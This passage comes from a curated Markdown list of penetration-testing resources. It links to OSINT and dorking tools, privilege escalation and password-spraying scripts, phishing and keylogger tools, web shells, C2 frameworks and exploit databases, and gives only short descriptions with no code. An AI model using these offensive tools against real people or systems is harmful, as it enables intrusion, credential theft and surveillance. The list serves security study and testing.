* [Open Web Application Security Project (OWASP)](https://www.owasp.org/index.php/Main_Page) - Worldwide not-for-profit charitable organization focused on improving the security of especially Web-based and Application-layer software.
* [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - Free online security knowledge library for pentesters and researchers.
* [Penetration Testing Execution Standard (PTES)](http://www.pentest-standard.org/) - Documentation designed to provide a common language and scope for performing and reporting the results of a penetration test.
* [Penetration Testing Framework (PTF)](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Outline for performing penetration tests compiled as a general framework usable by vulnerability analysts and penetration testers alike.
* [XSS-Payloads](http://www.xss-payloads.com) - Resource dedicated to all things XSS (cross-site), including payloads, tools, games, and documentation.
### Other Lists Online
* [.NET Programming](https://github.com/quozd/awesome-dotnet) - Software framework for Microsoft Windows platform development.
* [Infosec/hacking videos recorded by cooper](https://administraitor.video) - Collection of security conferences recorded by Cooper.
* [Android Exploits](https://github.com/sundaysec/Android-Exploits) - Guide on Android Exploitation and Hacks.
* [Android Security](https://github.com/ashishb/android-security-awesome) - Collection of Android security related resources.
* [AppSec](https://github.com/paragonie/awesome-appsec) - Resources for learning about application security.
* [Awesome Awesomness](https://github.com/bayandin/awesome-awesomeness) - The List of the Lists.
* [Awesome Malware](https://github.com/fabacab/awesome-malware) - Curated collection of awesome malware, botnets, and other post-exploitation tools.
* [Awesome Shodan Queries](https://github.com/jakejarvis/awesome-shodan-queries) - Awesome list of useful, funny, and depressing search queries for Shodan.
* [AWS Tool Arsenal](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) - List of tools for testing and securing AWS environments.
* [Blue Team](https://github.com/fabacab/awesome-cybersecurity-blueteam) - Awesome resources, tools, and other shiny things for cybersecurity blue teams.
* [C/C++ Programming](https://github.com/fffaraz/awesome-cpp) - One of the main language for open source security tools.
* [CTFs](https://github.com/apsdehal/awesome-ctf) - Capture The Flag frameworks, libraries, etc.
* [Forensics](https://github.com/Cugu/awesome-forensics) - Free (mostly open source) forensic analysis tools and resources.
* [Hacking](https://github.com/carpedm20/awesome-hacking) - Tutorials, tools, and resources.
* [Honeypots](https://github.com/paralax/awesome-honeypots) - Honeypots, tools, components, and more.
* [InfoSec § Hacking challenges](https://github.com/AnarchoTechNYC/meta/wiki/InfoSec#hacking-challenges) - Comprehensive directory of CTFs, wargames, hacking challenge websites, pentest practice lab exercises, and more.
* [Infosec](https://github.com/onlurking/awesome-infosec) - Information security resources for pentesting, forensics, and more.
* [JavaScript Programming](https://github.com/sorrycc/awesome-javascript) - In-browser development and scripting.
* [Kali Linux Tools](http://tools.kali.org/tools-listing) - List of tools present in Kali Linux.
* [Node.js Programming by @sindresorhus](https://github.com/sindresorhus/awesome-nodejs) - Curated list of delightful Node.js packages and resources.
* [Pentest Cheat Sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) - Awesome Pentest Cheat Sheets.
* [Python Programming by @svaksha](https://github.com/svaksha/pythonidae) - General Python programming.
* [Python Programming by @vinta](https://github.com/vinta/awesome-python) - General Python programming.
* [Python tools for penetration testers](https://github.com/dloss/python-pentest-tools) - Lots of pentesting tools are written in Python.
* [Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/) - An open-source inventory of tools, resources, CTF platforms and Operating Systems about CyberSecurity. ([Source](https://gitlab.com/rawsec/rawsec-cybersecurity-list))
* [Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) - List of Awesome Red Teaming Resources.
* [Ruby Programming by @Sdogruyol](https://github.com/Sdogruyol/awesome-ruby) - The de-facto language for writing exploits.
* [Ruby Programming by @dreikanter](https://github.com/dreikanter/ruby-bookmarks) - The de-facto language for writing exploits.
* [Ruby Programming by @markets](https://github.com/markets/awesome-ruby) - The de-facto language for writing exploits.
* [SecLists](https://github.com/danielmiessler/SecLists) - Collection of multiple types of lists used during security assessments.
* [SecTools](http://sectools.org/) - Top 125 Network Security Tools.
* [Security Talks](https://github.com/PaulSec/awesome-sec-talks) - Curated list of security conferences.
* [Security](https://github.com/sbilly/awesome-security) - Software, libraries, documents, and other resources.
* [Serverless Security](https://github.com/puresec/awesome-serverless-security/) - Curated list of awesome serverless security resources such as (e)books, articles, whitepapers, blogs and research papers.
* [Shell Scripting](https://github.com/alebcay/awesome-shell) - Command line frameworks, toolkits, guides and gizmos.
* [YARA](https://github.com/InQuest/awesome-yara) - YARA rules, tools, and people.
### Penetration Testing Report Templates
* [Public Pentesting Reports](https://github.com/juliocesarfort/public-pentesting-reports) - Curated list of public penetration test reports released by several consulting firms and academic security groups.
* [T&VS Pentesting Report Template](https://www.testandverification.com/wp-content/uploads/template-penetration-testing-report-v03.pdf) - Pentest report template provided by Test and Verification Services, Ltd.
* [Web Application Security Assessment Report Template](http://lucideus.com/pdf/stw.pdf) - Sample Web application security assessment reporting template provided by Lucideus.
## Open Sources Intelligence (OSINT)
See also [awesome-osint](https://github.com/jivoi/awesome-osint).
* [DataSploit](https://github.com/upgoingstar/datasploit) - OSINT visualizer utilizing Shodan, Censys, Clearbit, EmailHunter, FullContact, and Zoomeye behind the scenes.
* [Depix](https://github.com/beurtschipper/Depix) - Tool for recovering passwords from pixelized screenshots (by de-pixelating text).
* [GyoiThon](https://github.com/gyoisamurai/GyoiThon) - GyoiThon is an Intelligence Gathering tool using Machine Learning.
* [Intrigue](http://intrigue.io) - Automated OSINT & Attack Surface discovery framework with powerful API, UI and CLI.
* [Maltego](http://www.maltego.com/) - Proprietary software for open sources intelligence and forensics.
* [PacketTotal](https://packettotal.com/) - Simple, free, high-quality packet capture file analysis facilitating the quick detection of network-borne malware (using Zeek and Suricata IDS signatures under the hood).
* [Skiptracer](https://github.com/xillwillx/skiptracer) - OSINT scraping framework that utilizes basic Python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.
* [Sn1per](https://github.com/1N3/Sn1per) - Automated Pentest Recon Scanner.
* [Spiderfoot](http://www.spiderfoot.net/) - Multi-source OSINT automation tool with a Web UI and report visualizations.
* [creepy](https://github.com/ilektrojohn/creepy) - Geolocation OSINT tool.
* [gOSINT](https://github.com/Nhoya/gOSINT) - OSINT tool with multiple modules and a telegram scraper.
* [image-match](https://github.com/ascribe/image-match) - Quickly search over billions of images.
* [recon-ng](https://github.com/lanmaster53/recon-ng) - Full-featured Web Reconnaissance framework written in Python.
* [sn0int](https://github.com/kpcyrd/sn0int) - Semi-automatic OSINT framework and package manager.
* [Facebook Friend List Scraper](https://github.com/narkopolo/fb_friend_list_scraper) - Tool to scrape names and usernames from large friend lists on Facebook, without being rate limited.
### Data Broker and Search Engine Services
* [Hunter.io](https://hunter.io/) - Data broker providing a Web search interface for discovering the email addresses and other organizational details of a company.
* [Threat Crowd](https://www.threatcrowd.org/) - Search engine for threats.
* [Virus Total](https://www.virustotal.com/) - Free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.
* [surfraw](https://github.com/kisom/surfraw) - Fast UNIX command line interface to a variety of popular WWW search engines.
### Dorking tools
* [BinGoo](https://github.com/Hood3dRob1n/BinGoo) - GNU/Linux bash based Bing and Google Dorking Tool.
* [dorkbot](https://github.com/utiso/dorkbot) - Command-line tool to scan Google (or other) search results for vulnerabilities.
* [github-dorks](https://github.com/techgaun/github-dorks) - CLI tool to scan GitHub repos/organizations for potential sensitive information leaks.
* [GooDork](https://github.com/k3170makan/GooDork) - Command line Google dorking tool.
* [Google Hacking Database](https://www.exploit-db.com/google-hacking-database/) - Database of Google dorks; can be used for recon.
* [dork-cli](https://github.com/jgor/dork-cli) - Command line Google dork tool.
* [dorks](https://github.com/USSCltd/dorks) - Google hack database automation tool.
* [fast-recon](https://github.com/DanMcInerney/fast-recon) - Perform Google dorks against a domain.
* [pagodo](https://github.com/opsdisk/pagodo) - Automate Google Hacking Database scraping.
* [snitch](https://github.com/Smaash/snitch) - Information gathering via dorks.
### Email search and analysis tools
* [SimplyEmail](https://github.com/SimplySecurity/SimplyEmail) - Email recon made fast and easy.
* [WhatBreach](https://github.com/Ekultek/WhatBreach) - Search email addresses and discover all known breaches that this email has been seen in, and download the breached database if it is publicly available.
### Metadata harvesting and analysis
* [FOCA (Fingerprinting Organizations with Collected Archives)](https://www.elevenpaths.com/labstools/foca/) - Automated document harvester that searches Google, Bing, and DuckDuckGo to find and extrapolate internal company organizational structures.
* [metagoofil](https://github.com/laramies/metagoofil) - Metadata harvester.
* [theHarvester](https://github.com/laramies/theHarvester) - E-mail, subdomain and people names harvester.
### Network device discovery tools
* [Censys](https://www.censys.io/) - Collects data on hosts and websites through daily ZMap and ZGrab scans.
* [Shodan](https://www.shodan.io/) - World's first search engine for Internet-connected devices.
* [ZoomEye](https://www.zoomeye.org/) - Search engine for cyberspace that lets the user find specific network components.
### OSINT Online Resources
* [CertGraph](https://github.com/lanrat/certgraph) - Crawls a domain's SSL/TLS certificates for its certificate alternative names.
* [GhostProject](https://ghostproject.fr/) - Searchable database of billions of cleartext passwords, partially visible for free.
* [NetBootcamp OSINT Tools](http://netbootcamp.org/osinttools/) - Collection of OSINT links and custom Web interfaces to other services.
* [OSINT Framework](http://osintframework.com/) - Collection of various OSINT tools broken out by category.
* [WiGLE.net](https://wigle.net/) - Information about wireless networks world-wide, with user-friendly desktop and web applications.
### Source code repository searching tools
See also *[Web-accessible source code ripping tools](#web-accessible-source-code-ripping-tools)*.
* [vcsmap](https://github.com/melvinsh/vcsmap) - Plugin-based tool to scan public version control systems for sensitive information.
* [Yar](https://github.com/Furduhlutur/yar) - Clone git repositories to search through the whole commit history in order of commit time for secrets, tokens, or passwords.
### Web application and resource analysis tools
* [BlindElephant](http://blindelephant.sourceforge.net/) - Web application fingerprinter.
* [EyeWitness](https://github.com/ChrisTruncer/EyeWitness) - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
* [VHostScan](https://github.com/codingo/VHostScan) - Virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
* [Wappalyzer](https://www.wappalyzer.com/) - Wappalyzer uncovers the technologies used on websites.
* [WhatWaf](https://github.com/Ekultek/WhatWaf) - Detect and bypass web application firewalls and protection systems.
* [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Website fingerprinter.
* [wafw00f](https://github.com/EnableSecurity/wafw00f) - Identifies and fingerprints Web Application Firewall (WAF) products.
* [webscreenshot](https://github.com/maaaaz/webscreenshot) - Simple script to take screenshots of websites from a list of sites.
## Operating System Distributions
* [Android Tamer](https://androidtamer.com/) - Distribution built for Android security professionals that includes tools required for Android security testing.
* [ArchStrike](https://archstrike.org/) - Arch GNU/Linux repository for security professionals and enthusiasts.
* [AttifyOS](https://github.com/adi0x90/attifyos) - GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.
* [BlackArch](https://www.blackarch.org/) - Arch GNU/Linux-based distribution for penetration testers and security researchers.
* [Buscador](https://inteltechniques.com/buscador/) - GNU/Linux virtual machine that is pre-configured for online investigators.
* [Kali](https://www.kali.org/) - Rolling Debian-based GNU/Linux distribution designed for penetration testing and digital forensics.
* [Network Security Toolkit (NST)](http://networksecuritytoolkit.org/) - Fedora-based GNU/Linux bootable live Operating System designed to provide easy access to best-of-breed open source network security applications.
* [Parrot](https://parrotlinux.org/) - Distribution similar to Kali, with support for multiple hardware architectures.
* [PentestBox](https://pentestbox.org/) - Open source pre-configured portable penetration testing environment for the Windows Operating System.
* [The Pentesters Framework](https://github.com/trustedsec/ptf) - Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that omits less frequently used utilities.
## Periodicals
* [2600: The Hacker Quarterly](https://www.2600.com/Magazine/DigitalEditions) - American publication about technology and computer "underground" culture.
* [Phrack Magazine](http://www.phrack.org/) - By far the longest running hacker zine.
## Physical Access Tools
* [AT Commands](https://atcommands.org/) - Use AT commands over an Android device's USB port to rewrite device firmware, bypass security mechanisms, exfiltrate sensitive information, perform screen unlocks, and inject touch events.
* [Bash Bunny](https://www.hak5.org/gear/bash-bunny) - Local exploit delivery tool in the form of a USB thumbdrive in which you write payloads in a DSL called BunnyScript.
* [LAN Turtle](https://lanturtle.com/) - Covert "USB Ethernet Adapter" that provides remote access, network intelligence gathering, and MITM capabilities when installed in a local network.
* [PCILeech](https://github.com/ufrisk/pcileech) - Uses PCIe hardware devices to read and write from the target system memory via Direct Memory Access (DMA) over PCIe.
* [Packet Squirrel](https://www.hak5.org/gear/packet-squirrel) - Ethernet multi-tool designed to enable covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.
* [Poisontap](https://samy.pl/poisontap/) - Siphons cookies, exposes internal (LAN-side) router and installs web backdoor on locked computers.
* [Proxmark3](https://proxmark3.com/) - RFID/NFC cloning, replay, and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/keyfobs, and more.
* [Thunderclap](https://thunderclap.io/) - Open source I/O security research platform for auditing physical DMA-enabled hardware peripheral ports.
* [USB Rubber Ducky](http://usbrubberducky.com/) - Customizable keystroke injection attack platform masquerading as a USB thumbdrive.
## Privilege Escalation Tools
* [Active Directory and Privilege Escalation (ADAPE)](https://github.com/hausec/ADAPE-Script) - Umbrella script that automates numerous useful PowerShell modules to discover security misconfigurations and attempt privilege escalation against Active Directory.
* [GTFOBins](https://gtfobins.github.io/) - Curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
* [LOLBAS (Living Off The Land Binaries and Scripts)](https://lolbas-project.github.io/) - Documents binaries, scripts, and libraries that can be used for "Living Off The Land" techniques, i.e., binaries that can be used by an attacker to perform actions beyond their original purpose.
* [LinEnum](https://github.com/rebootuser/LinEnum) - Scripted local Linux enumeration and privilege escalation checker useful for auditing a host and during CTF gaming.
* [Postenum](https://github.com/mbahadou/postenum) - Shell script used for enumerating possible privilege escalation opportunities on a local GNU/Linux system.
* [unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) - Shell script to check for simple privilege escalation vectors on UNIX systems.
### Password Spraying Tools
* [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) - Tool written in PowerShell to perform a password spray attack against users of a domain.
* [SprayingToolkit](https://github.com/byt3bl33d3r/SprayingToolkit) - Scripts to make password spraying attacks against Lync/S4B, Outlook Web Access (OWA) and Office 365 (O365) a lot quicker, less painful and more efficient.
## Reverse Engineering
See also [awesome-reversing](https://github.com/tylerha97/awesome-reversing), [*Exploit Development Tools*](#exploit-development-tools).
### Reverse Engineering Books
* [Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015](http://www.amazon.com/Hacking-Ethical-Hackers-Handbook-Edition/dp/0071832386)
* [Hacking the Xbox by Andrew Huang, 2003](https://nostarch.com/xbox.htm)
* [Practical Reverse Engineering by Bruce Dang et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118787315.html)
* [Reverse Engineering for Beginners by Dennis Yurichev](http://beginners.re/)
* [The IDA Pro Book by Chris Eagle, 2011](https://nostarch.com/idapro2.htm)
### Reverse Engineering Tools
* [angr](https://angr.io/) - Platform-agnostic binary analysis framework.
* [Capstone](http://www.capstone-engine.org/) - Lightweight multi-platform, multi-architecture disassembly framework.
* [Detect It Easy(DiE)](https://github.com/horsicq/Detect-It-Easy) - Program for determining types of files for Windows, Linux and MacOS.
* [Evan's Debugger](http://www.codef00.com/projects#debugger) - OllyDbg-like debugger for GNU/Linux.
* [Frida](https://www.frida.re/) - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
* [Fridax](https://github.com/NorthwaveNL/fridax) - Read variables and intercept/hook functions in Xamarin/Mono JIT and AOT compiled iOS/Android applications.
* [Ghidra](https://www.ghidra-sre.org/) - Suite of free software reverse engineering tools developed by NSA's Research Directorate originally exposed in WikiLeaks's "Vault 7" publication and now maintained as open source software.
* [Immunity Debugger](https://immunityinc.com/products/debugger/) - Powerful way to write exploits and analyze malware.
* [Interactive Disassembler (IDA Pro)](https://www.hex-rays.com/products/ida/) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, [IDA Free](https://www.hex-rays.com/products/ida/support/download_freeware.shtml).
* [Medusa](https://github.com/wisk/medusa) - Open source, cross-platform interactive disassembler.
* [OllyDbg](http://www.ollydbg.de/) - x86 debugger for Windows binaries that emphasizes binary code analysis.
* [PyREBox](https://github.com/Cisco-Talos/pyrebox) - Python scriptable Reverse Engineering sandbox by Cisco-Talos.
* [Radare2](http://rada.re/r/index.html) - Open source, crossplatform reverse engineering framework.
* [UEFITool](https://github.com/LongSoft/UEFITool) - UEFI firmware image viewer and editor.
* [Voltron](https://github.com/snare/voltron) - Extensible debugger UI toolkit written in Python.
* [WDK/WinDbg](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools) - Windows Driver Kit and WinDbg.
* [binwalk](https://github.com/devttys0/binwalk) - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
* [boxxy](https://github.com/kpcyrd/boxxy-rs) - Linkable sandbox explorer.
* [dnSpy](https://github.com/0xd4d/dnSpy) - Tool to reverse engineer .NET assemblies.
* [plasma](https://github.com/joelpx/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
* [pwndbg](https://github.com/pwndbg/pwndbg) - GDB plug-in that eases debugging with GDB, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers, and exploit developers.
* [rVMI](https://github.com/fireeye/rVMI) - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.
* [x64dbg](http://x64dbg.com/) - Open source x64/x32 debugger for windows.
## Security Education Courses
* [ARIZONA CYBER WARFARE RANGE](http://azcwr.org/) - 24x7 live fire exercises for beginners through real world operations; capability for upward progression into the real world of cyber warfare.
* [Cybrary](http://cybrary.it) - Free courses in ethical hacking and advanced penetration testing. Advanced penetration testing courses are based on the book 'Penetration Testing for Highly Secured Environments'.
* [European Union Agency for Network and Information Security](https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material) - ENISA Cyber Security Training material.
* [Offensive Security Training](https://www.offensive-security.com/information-security-training/) - Training from BackTrack/Kali developers.
* [Open Security Training](http://opensecuritytraining.info/) - Training material for computer security classes.
* [Roppers Academy Training](https://www.hoppersroppers.org/training.html) - Free courses on computing and security fundamentals designed to train a beginner to crush their first CTF.
* [SANS Security Training](http://www.sans.org/) - Computer Security Training & Certification.
## Shellcoding Guides and Tutorials
* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - Tutorials on how to develop exploits.
* [Shellcode Examples](http://shell-storm.org/shellcode/) - Shellcodes database.
* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html) - Tutorial on how to write shellcode.
* [The Shellcoder's Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
## Side-channel Tools
* [ChipWhisperer](http://chipwhisperer.com) - Complete open-source toolchain for side-channel power analysis and glitching attacks.
* [SGX-Step](https://github.com/jovanbulck/sgx-step) - Open-source framework to facilitate side-channel attack research on Intel x86 processors in general and Intel SGX (Software Guard Extensions) platforms in particular.
* [TRRespass](https://github.com/vusec/trrespass) - Many-sided rowhammer tool suite able to reverse engineer the contents of DDR3 and DDR4 memory chips protected by Target Row Refresh mitigations.
## Social Engineering
See also [awesome-social-engineering](https://github.com/v2-dev/awesome-social-engineering).
### Social Engineering Books
* [Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011](http://www.hachettebookgroup.com/titles/kevin-mitnick/ghost-in-the-wires/9780316134477/)
* [No Tech Hacking by Johnny Long & Jack Wiles, 2008](https://www.elsevier.com/books/no-tech-hacking/mitnick/978-1-59749-215-7)
* [Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014](https://www.mhprofessional.com/9780071818469-usa-social-engineering-in-it-security-tools-tactics-and-techniques-group)
* [The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0471237124.html)
* [The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764569597.html)
* [Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118608577.html)
### Social Engineering Online Resources
* [Social Engineering Framework](http://www.social-engineer.org/framework/general-discussion/) - Information resource for social engineers.
### Social Engineering Tools
* [Beelogger](https://github.com/4w4k3/BeeLogger) - Tool for generating keylooger.
* [Catphish](https://github.com/ring0lab/catphish) - Tool for phishing and corporate espionage written in Ruby.
* [Evilginx2](https://github.com/kgretzky/evilginx2) - Standalone Machine-in-the-Middle (MitM) reverse proxy attack framework for setting up phishing pages capable of defeating most forms of 2FA security schemes.
* [FiercePhish](https://github.com/Raikia/FiercePhish) - Full-fledged phishing framework to manage all phishing engagements.
* [Gophish](https://getgophish.com) - Open-source phishing framework.
* [King Phisher](https://github.com/securestate/king-phisher) - Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.
* [Modlishka](https://github.com/drk1wi/Modlishka) - Flexible and powerful reverse proxy with real-time two-factor authentication.
* [ReelPhish](https://github.com/fireeye/ReelPhish) - Real-time two-factor phishing tool.
* [Social Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit) - Open source pentesting framework designed for social engineering featuring a number of custom attack vectors to make believable attacks quickly.
* [SocialFish](https://github.com/UndeadSec/SocialFish) - Social media phishing framework that can run on an Android phone or in a Docker container.
* [phishery](https://github.com/ryhanson/phishery) - TLS/SSL enabled Basic Auth credential harvester.
* [wifiphisher](https://github.com/sophron/wifiphisher) - Automated phishing attacks against WiFi networks.
## Static Analyzers
* [Brakeman](https://github.com/presidentbeef/brakeman) - Static analysis security vulnerability scanner for Ruby on Rails applications.
* [FindBugs](http://findbugs.sourceforge.net/) - Free software static analyzer to look for bugs in Java code.
* [Progpilot](https://github.com/designsecurity/progpilot) - Static security analysis tool for PHP code.
* [RegEx-DoS](https://github.com/jagracey/RegEx-DoS) - Analyzes source code for Regular Expressions susceptible to Denial of Service attacks.
* [bandit](https://pypi.python.org/pypi/bandit/) - Security oriented static analyser for Python code.
* [cppcheck](http://cppcheck.sourceforge.net/) - Extensible C/C++ static analyzer focused on finding bugs.
* [sobelow](https://github.com/nccgroup/sobelow) - Security-focused static analysis for the Phoenix Framework.
* [cwe_checker](https://github.com/fkie-cad/cwe_checker) - Suite of tools built atop the Binary Analysis Platform (BAP) to heuristically detect CWEs in compiled binaries and firmware.
## Steganography Tools
* [Cloakify](https://github.com/TryCatchHCF/Cloakify) - Textual steganography toolkit that converts any filetype into lists of everyday strings.
* [StegOnline](https://stegonline.georgeom.net/) - Web-based, enhanced, and open-source port of StegSolve.
* [StegCracker](https://github.com/Paradoxis/StegCracker) - Steganography brute-force utility to uncover hidden data inside files.
## Vulnerability Databases
* [Bugtraq (BID)](http://www.securityfocus.com/bid/) - Software security bug identification database compiled from submissions to the SecurityFocus mailing list and other sources, operated by Symantec, Inc.
* [CISA Known Vulnerabilities Database (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) - Vulnerabilities in various systems already known to America's cyber defense agency, the Cybersecurity and Infrastructure Security Agency, to be actively exploited.
* [CXSecurity](https://cxsecurity.com/) - Archive of published CVE and Bugtraq software vulnerabilities cross-referenced with a Google dork database for discovering the listed vulnerability.
* [China National Vulnerability Database (CNNVD)](http://www.cnnvd.org.cn/) - Chinese government-run vulnerability database analoguous to the United States's CVE database hosted by Mitre Corporation.
* [Common Vulnerabilities and Exposures (CVE)](https://cve.mitre.org/) - Dictionary of common names (i.e., CVE Identifiers) for publicly known security vulnerabilities.
* [Exploit-DB](https://www.exploit-db.com/) - Non-profit project hosting exploits for software vulnerabilities, provided as a public service by Offensive Security.
* [Full-Disclosure](http://seclists.org/fulldisclosure/) - Public, vendor-neutral forum for detailed discussion of vulnerabilities, often publishes details before many other sources.
* [GitHub Advisories](https://github.com/advisories/) - Public vulnerability advisories published by or affecting codebases hosted by GitHub, including open source projects.
* [HPI-VDB](https://hpi-vdb.de/) - Aggregator of cross-referenced software vulnerabilities offering free-of-charge API access, provided by the Hasso-Plattner Institute, Potsdam.
* [Inj3ct0r](https://www.0day.today/) - Exploit marketplace and vulnerability information aggregator. ([Onion service](http://mvfjfugdwgc5uwho.onion/).)
* [Microsoft Security Advisories and Bulletins](https://docs.microsoft.com/en-us/security-updates/) - Archive and announcements of security advisories impacting Microsoft software, published by the Microsoft Security Response Center (MSRC).
* [Mozilla Foundation Security Advisories](https://www.mozilla.org/security/advisories/) - Archive of security advisories impacting Mozilla software, including the Firefox Web Browser.
* [National Vulnerability Database (NVD)](https://nvd.nist.gov/) - United States government's National Vulnerability Database provides additional meta-data (CPE, CVSS scoring) of the standard CVE List along with a fine-grained search engine.
* [Open Source Vulnerabilities (OSV)](https://osv.dev/) - Database of vulnerabilities affecting open source software, queryable by project, Git commit, or version.
* [Packet Storm](https://packetstormsecurity.com/files/) - Compendium of exploits, advisories, tools, and other security-related resources aggregated from across the industry.
* [SecuriTeam](http://www.securiteam.com/) - Independent source of software vulnerability information.
* [Snyk Vulnerability DB](https://snyk.io/vuln/) - Detailed information and remediation guidance for vulnerabilities known by Snyk.
* [US-CERT Vulnerability Notes Database](https://www.kb.cert.org/vuls/) - Summaries, technical details, remediation information, and lists of vendors affected by software vulnerabilities, aggregated by the United States Computer Emergency Response Team (US-CERT).
* [VulDB](https://vuldb.com) - Independent vulnerability database with user community, exploit details, and additional meta data (e.g. CPE, CVSS, CWE)
* [Vulnerability Lab](https://www.vulnerability-lab.com/) - Open forum for security advisories organized by category of exploit target.
* [Vulners](https://vulners.com/) - Security database of software vulnerabilities.
* [Vulmon](https://vulmon.com/) - Vulnerability search engine with vulnerability intelligence features that conducts full text searches in its database.
* [Zero Day Initiative](http://zerodayinitiative.com/advisories/published/) - Bug bounty program with publicly accessible archive of published security advisories, operated by TippingPoint.
## Web Exploitation
* [FuzzDB](https://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
* [Offensive Web Testing Framework (OWTF)](https://www.owasp.org/index.php/OWASP_OWTF) - Python-based framework for pentesting Web applications based on the OWASP Testing Guide.
* [Raccoon](https://github.com/evyatarmeged/Raccoon) - High performance offensive security tool for reconnaissance and vulnerability scanning.
* [WPSploit](https://github.com/espreto/wpsploit) - Exploit WordPress-powered websites with Metasploit.
* [autochrome](https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/march/autochrome/) - Chrome browser profile preconfigured with appropriate settings needed for web application testing.
* [badtouch](https://github.com/kpcyrd/badtouch) - Scriptable network authentication cracker.
* [gobuster](https://github.com/OJ/gobuster) - Lean multipurpose brute force search/fuzzing tool for Web (and DNS) reconnaissance.
* [sslstrip2](https://github.com/LeonardoNve/sslstrip2) - SSLStrip version to defeat HSTS.
* [sslstrip](https://www.thoughtcrime.org/software/sslstrip/) - Demonstration of the HTTPS stripping attacks.
### Intercepting Web proxies
See also *[Proxies and Machine-in-the-Middle (MITM) Tools](#proxies-and-machine-in-the-middle-mitm-tools)*.
* [Burp Suite](https://portswigger.net/burp/) - Integrated platform for performing security testing of web applications.
* [Fiddler](https://www.telerik.com/fiddler) - Free cross-platform web debugging proxy with user-friendly companion tools.
* [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org/) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
* [mitmproxy](https://mitmproxy.org/) - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
### Web file inclusion tools
* [Kadimus](https://github.com/P0cL4bs/Kadimus) - LFI scan and exploit tool.
* [LFISuite](https://github.com/D35m0nd142/LFISuite) - Automatic LFI scanner and exploiter.
* [fimap](https://github.com/kurobeats/fimap) - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
* [liffy](https://github.com/hvqzao/liffy) - LFI exploitation tool.
### Web injection tools
* [Commix](https://github.com/commixproject/commix) - Automated all-in-one operating system command injection and exploitation tool.
* [NoSQLmap](https://github.com/codingo/NoSQLMap) - Automatic NoSQL injection and database takeover tool.
* [SQLmap](http://sqlmap.org/) - Automatic SQL injection and database takeover tool.
* [tplmap](https://github.com/epinna/tplmap) - Automatic server-side template injection and Web server takeover tool.
### Web path discovery and bruteforcing tools
* [DotDotPwn](https://dotdotpwn.blogspot.com/) - Directory traversal fuzzer.
* [dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner.
* [recursebuster](https://github.com/c-sto/recursebuster) - Content discovery tool to perform directory and file bruteforcing.
### Web shells and C2 frameworks
* [Browser Exploitation Framework (BeEF)](https://github.com/beefproject/beef) - Command and control server for delivering exploits to commandeered Web browsers.
* [DAws](https://github.com/dotcppfile/DAws) - Advanced Web shell.
* [Merlin](https://github.com/Ne0nd0g/merlin) - Cross-platform post-exploitation HTTP/2 Command and Control server and agent written in Golang.
* [PhpSploit](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner.
* [SharPyShell](https://github.com/antonioCoco/SharPyShell) - Tiny and obfuscated ASP.NET webshell for C# web applications.
* [weevely3](https://github.com/epinna/weevely3) - Weaponized PHP-based web shell.
### Web-accessible source code ripping tools
* [DVCS Ripper](https://github.com/kost/dvcs-ripper) - Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR.
* [GitTools](https://github.com/internetwache/GitTools) - Automatically find and download Web-accessible `.git` repositories.
* [git-dumper](https://github.com/arthaud/git-dumper) - Tool to dump a git repository from a website.
* [git-scanner](https://github.com/HightechSec/git-scanner) - Tool for bug hunting or pentesting websites that have open `.git` repositories available in public.
